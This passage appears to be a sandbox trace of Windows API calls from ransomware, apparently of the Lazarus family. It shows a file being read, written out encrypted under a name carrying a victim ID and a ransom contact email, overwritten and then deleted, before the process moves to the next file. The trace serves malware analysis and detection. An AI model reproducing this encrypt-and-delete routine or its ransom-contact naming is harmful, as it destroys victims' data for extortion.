Flags=0x0, Size=0x48) returned 0x693f0 [0070.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 36 [0070.773] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.773] GetFileType (hFile=0x428) returned 0x1 [0070.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0070.773] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0070.773] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0070.773] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0070.774] CloseHandle (hObject=0x428) returned 1 [0070.774] AreFileApisANSI () returned 1 [0070.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0070.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 36 [0070.774] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.774] GetFileType (hFile=0x428) returned 0x1 [0070.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0070.774] CloseHandle (hObject=0x428) returned 1 [0070.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0070.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0070.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0070.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0070.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.775] AreFileApisANSI () returned 1 [0070.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0070.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 36 [0070.775] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19)) returned 1 [0070.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0070.775] AreFileApisANSI () returned 1 [0070.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0070.776] GetLastError () returned 0x0 [0070.776] SetLastError (dwErrCode=0x0) [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0070.776] GetLastError () returned 0x0 [0070.776] SetLastError (dwErrCode=0x0) [0070.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0070.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76020 [0070.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.776] AreFileApisANSI () returned 1 [0070.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0070.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0070.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0070.777] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.780] GetFileType (hFile=0x428) returned 0x1 [0070.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0070.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0070.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.780] AreFileApisANSI () returned 1 [0070.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0070.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 36 [0070.781] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.781] GetFileType (hFile=0x418) returned 0x1 [0070.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0070.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0070.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.781] GetLastError () returned 0x0 [0070.781] SetLastError (dwErrCode=0x0) [0070.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.781] GetLastError () returned 0x0 [0070.781] SetLastError (dwErrCode=0x0) [0070.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0070.781] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0xf19, lpOverlapped=0x0) returned 1 [0070.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0070.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0070.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0070.783] GetLastError () returned 0x0 [0070.783] SetLastError (dwErrCode=0x0) [0070.783] GetLastError () returned 0x0 [0070.783] SetLastError (dwErrCode=0x0) [0070.783] GetLastError () returned 0x0 [0070.783] SetLastError (dwErrCode=0x0) [0070.783] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0070.784] GetLastError () returned 0x0 [0070.784] SetLastError (dwErrCode=0x0) [0070.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9) returned 0x7d630 [0070.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0070.784] GetLastError () returned 0x0 [0070.784] SetLastError (dwErrCode=0x0) [0070.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0070.784] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0xf20, lpOverlapped=0x0) returned 1 [0070.785] GetLastError () returned 0x0 [0070.785] SetLastError (dwErrCode=0x0) [0070.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0070.785] GetLastError () returned 0x0 [0070.785] SetLastError (dwErrCode=0x0) [0070.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0070.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0070.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0070.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0070.785] CloseHandle (hObject=0x428) returned 1 [0070.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0070.786] CloseHandle (hObject=0x418) returned 1 [0070.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0070.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.787] AreFileApisANSI () returned 1 [0070.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0070.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 36 [0070.787] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.787] GetFileType (hFile=0x418) returned 0x1 [0070.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0070.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0070.788] GetLastError () returned 0xb7 [0070.788] SetLastError (dwErrCode=0xb7) [0070.788] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0070.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0070.789] CloseHandle (hObject=0x418) returned 1 [0070.789] AreFileApisANSI () returned 1 [0070.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0070.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 36 [0070.790] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 1 [0070.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0070.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0070.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.791] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0070.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0070.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0070.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0070.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0070.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0070.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0070.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0070.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0070.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0070.792] AreFileApisANSI () returned 1 [0070.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0070.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.792] AreFileApisANSI () returned 1 [0070.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0070.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 45 [0070.793] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 